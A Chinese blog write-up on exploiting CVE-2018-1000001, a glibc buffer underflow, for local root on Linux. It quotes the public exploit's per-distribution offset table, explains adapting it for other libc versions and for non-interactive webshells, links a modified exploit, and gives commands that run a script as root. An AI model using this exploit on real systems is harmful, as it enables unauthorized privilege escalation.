渗透测试

CVE-2018-1000001本地linux提权

NNN4cyNNN4cy 渗透测试, 漏洞分析 2018-05-18
1749 0

作者:l3m0n

最近打比赛遇上的提权漏洞,环境为ubuntu 17.10 (Artful Aardvark)
另外也需要在无交互式的webshell中提权(不通外网)。

漏洞细节: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/

这个洞主要是出在getcwd函数上,在路径判断出现一些问题,作者最后使用具有SUID的mountunmount的程序进行提权操作,所以这个主要对libc方面有一些要求.

可以看到exp里面,硬编码了一些数据在里面,如果系统符合才会进行执行,这就导致有些系统是不会成功的:
https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<span class="dt"><span class="hljs-keyword">static</span></span> <span class="dt"><span class="hljs-keyword">char</span></span>* osSpecificExploitDataList[]={
<span class="co"><span class="hljs-comment">// Debian Stretch</span></span>
    <span class="st"><span class="hljs-string">"</span></span><span class="ch"><span class="hljs-string">\"</span></span><span class="st"><span class="hljs-string">9 (stretch)</span></span><span class="ch"><span class="hljs-string">\"</span></span><span class="st"><span class="hljs-string">"</span></span>,
    <span class="st"><span class="hljs-string">"../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A"</span></span>,
    <span class="st"><span class="hljs-string">"from_archive"</span></span>,
<span class="co"><span class="hljs-comment">// Delta for Debian Stretch "2.24-11+deb9u1"</span></span>
    <span class="st"><span class="hljs-string">"</span></span><span class="ch"><span class="hljs-string">\x06</span></span><span class="st"><span class="hljs-string">\0\0\0</span></span><span class="ch"><span class="hljs-string">\x24</span></span><span class="st"><span class="hljs-string">\0\0\0</span></span><span class="ch"><span class="hljs-string">\x3e</span></span><span class="st"><span class="hljs-string">\0\0\0</span></span><span class="ch"><span class="hljs-string">\x7f\xb9\x08\x00\x4f\x86\x09\x00</span></span><span class="st"><span class="hljs-string">"</span></span>,
<span class="co"><span class="hljs-comment">// Ubuntu Xenial libc=2.23-0ubuntu9</span></span>
    <span class="st"><span class="hljs-string">"</span></span><span class="ch"><span class="hljs-string">\"</span></span><span class="st"><span class="hljs-string">16.04.3 LTS (Xenial Xerus)</span></span><span class="ch"><span class="hljs-string">\"</span></span><span class="st"><span class="hljs-string">"</span></span>,
    <span class="st"><span class="hljs-string">"../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A"</span></span>,
    <span class="st"><span class="hljs-string">"_nl_load_locale_from_archive"</span></span>,
    <span class="st"><span class="hljs-string">"</span></span><span class="ch"><span class="hljs-string">\x07</span></span><span class="st"><span class="hljs-string">\0\0\0</span></span><span class="ch"><span class="hljs-string">\x26</span></span><span class="st"><span class="hljs-string">\0\0\0</span></span><span class="ch"><span class="hljs-string">\x40</span></span><span class="st"><span class="hljs-string">\0\0\0</span></span><span class="ch"><span class="hljs-string">\xd0\xf5\x09\x00\xf0\xc1\x0a\x00</span></span><span class="st"><span class="hljs-string">"</span></span>,
<span class="co"><span class="hljs-comment">// Linux Mint 18.3 Sylvia - same parameters as "Ubuntu Xenial"</span></span>
    <span class="st"><span class="hljs-string">"</span></span><span class="ch"><span class="hljs-string">\"</span></span><span class="st"><span class="hljs-string">18.3 (Sylvia)</span></span><span class="ch"><span class="hljs-string">\"</span></span><span class="st"><span class="hljs-string">"</span></span>,
    <span class="st"><span class="hljs-string">"../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A"</span></span>,
    <span class="st"><span class="hljs-string">"_nl_load_locale_from_archive"</span></span>,
    <span class="st"><span class="hljs-string">"</span></span><span class="ch"><span class="hljs-string">\x07</span></span><span class="st"><span class="hljs-string">\0\0\0</span></span><span class="ch"><span class="hljs-string">\x26</span></span><span class="st"><span class="hljs-string">\0\0\0</span></span><span class="ch"><span class="hljs-string">\x40</span></span><span class="st"><span class="hljs-string">\0\0\0</span></span><span class="ch"><span class="hljs-string">\xd0\xf5\x09\x00\xf0\xc1\x0a\x00</span></span><span class="st"><span class="hljs-string">"</span></span>,
    <span class="hljs-literal">NULL</span>
};
 
osReleaseExploitData=osSpecificExploitDataList;
<span class="kw"><span class="hljs-keyword">if</span></span>(osRelease) {
<span class="co"><span class="hljs-comment">// If an OS was detected, try to find it in list. Otherwise use</span></span>
<span class="co"><span class="hljs-comment">// default.</span></span>
<span class="kw"><span class="hljs-keyword">for</span></span>(<span class="dt"><span class="hljs-keyword">int</span></span> tPos=<span class="dv"><span class="hljs-number">0</span></span>; osSpecificExploitDataList[tPos]; tPos+=<span class="dv"><span class="hljs-number">4</span></span>) {
<span class="kw"><span class="hljs-keyword">if</span></span>(!<span class="hljs-built_in">strcmp</span>(osSpecificExploitDataList[tPos], osRelease)) {
   osReleaseExploitData=osSpecificExploitDataList+tPos;
   <span class="kw"><span class="hljs-keyword">break</span></span>;
}
}
}

可以获取VERSION,然后将上处修改一下。

赛后使用阿里云的ubuntu 16.04.3做复现,可以提权成功。

至于无交互的地方,修改此处即可

修改版为: https://raw.githubusercontent.com/l3m0n/pentest_tools/master/%E6%9D%83%E9%99%90%E6%94%BB%E9%98%B2/linux/%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83/CVE-2018-1000001/love1.c

PHP
1
2
3
4
gcc -o <span class="hljs-built_in">exp</span> love1.c -<span class="hljs-built_in">std</span>=c99
./<span class="hljs-built_in">exp</span>
 
这个将会以root权限执行/bin/bash /tmp/aaaaa.sh

know it then do it
(0)

本文由来源 l3m0n,由 NNN4cy 整理编辑!

NNN4cy

NNN4cy

 文章:85

相关文章

热评文章

发表评论

用户登录